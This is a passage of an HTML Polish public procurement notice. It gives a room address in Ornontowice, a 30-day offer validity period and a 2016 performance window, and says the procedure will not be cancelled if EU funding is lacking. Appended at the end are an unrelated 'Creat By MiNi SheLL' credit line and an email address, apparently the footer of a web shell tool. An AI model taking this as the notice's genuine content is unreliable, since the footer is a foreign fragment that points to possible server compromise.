43-178 Ornontowice 
pokój nr 413.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wymagany  termin realizacji: od dnia 01.01.2016r. do dnia 31.12.2016r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com